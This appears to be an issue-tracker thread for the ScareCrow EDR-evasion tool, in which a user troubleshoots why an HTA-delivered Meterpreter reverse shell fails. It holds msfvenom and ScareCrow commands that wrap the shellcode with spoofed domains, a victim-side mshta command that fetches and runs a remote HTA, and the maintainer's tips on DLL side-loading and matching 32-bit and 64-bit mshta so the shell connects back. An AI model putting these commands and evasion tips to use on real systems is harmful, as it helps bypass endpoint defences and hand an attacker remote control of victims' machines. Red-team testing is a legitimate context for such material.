Delivery HTA with Loaders Control or Wscript not working

[Vyiel]

Bin file: Stageless -> msfvenom -p windows/x64/meterpreter_reverse_tcp EXE files are deleted on download by EDRs. But for HTA deliveries, A reverse shell isn't happening.

Commands ran: ./ScareCrow -I new64.bin -domain microsoft.com -delivery hta -url http://10.0.0.12:8000 -Loader control -O testhta.hta ./ScareCrow -I new64.bin -domain microsoft.com -delivery hta -url http://10.0.0.12:8000 -Loader control -O jstest.js ./ScareCrow -I new64.bin -domain microsoft.com -delivery hta -url http://10.0.0.12:8000 -Loader wscript -O jstest.js

None of them are giving back a reverse shell.

[Tylous]

have you tried without the HTA flag to see if it's something outside of the HTA?

[Vyiel]

Yes, worked with Binary and it does give me a rev sh and also with and without the HTA flag and a delivery. Just running it locally as well. The HTA definitely didn't work. The JS once did when ran locally.

[Vyiel]

@Tylous Also noticed something from ProcExp and ProcMon, MSHTA keeps running and gets stuck and in case I close the fileserver, MSHTA comes back with connection lost error.

[Tylous]

So I can't tell you what's happening with the limited information and three different cases. So to address things first. The JS script will only work once unless you terminate the other shell as it side-loads a DLL to execute the shellcode, if that DLL is already being used by another beacon/call process it won't work. As for the MSHTA issue. The default MSHTA is 32bit so if you're calling it from the command prompt or any way that is not a full path to the 64 bit will more than likely be spawning the 32-bit version. All secondary actions will be in the context of a 32-bit process meaning your 64-bit shellcode won't work.

[Vyiel]

Thanks for clearing this up but doesn't still seem to work.

Command ran for payload creation: ./ScareCrow -I 125-4444.bin -Loader control -O ms64.hta -delivery hta -url http://192.168.1.125:8000 -domain google.com

Command Ran on Victim: C:\Windows\SysWOW64> mshta.exe http://192.168.1.125:8000/ms64.hta

Thus, getting a 64 bit version of MSHTA.

[Tylous]

Please note the picture below

[Vyiel]

Wow, Can you help me with where can I find the 64 bit one? Please?

[Tylous]

This is beyond the realm of the issue tracker for Scarecrow but very briefly the system32 one is the correct one, the problem is the command you are calling if you don't call the from system32 properly it might default to the 32-bit version. To ensure you call the RIGHT mshta you need to be in the right folder or call with the exact path. Please note below how calling from system32 mshta.exe works fine:

[Vyiel]

Extremely sorry for branching out but When I was searching the internet for this, found out that if we launch mshta.exe from a 32 bit cmd, then mshta will also be CMD and vice versa. So tested it out to see it fail again.

I have tested with a binary loader just to see if the shellcode had any problems and it turns out binary is working fine and mshta doesn't even if it's 64 bit.

[Tylous]

did you try executing mshta.exe from c:\windows\sytem32? Cause that picture doesn't show that you did it from that directory?

[Vyiel]

[Vyiel]

Respectfully and patiently asking. Please let me know on any updates regarding this. Thanks a lot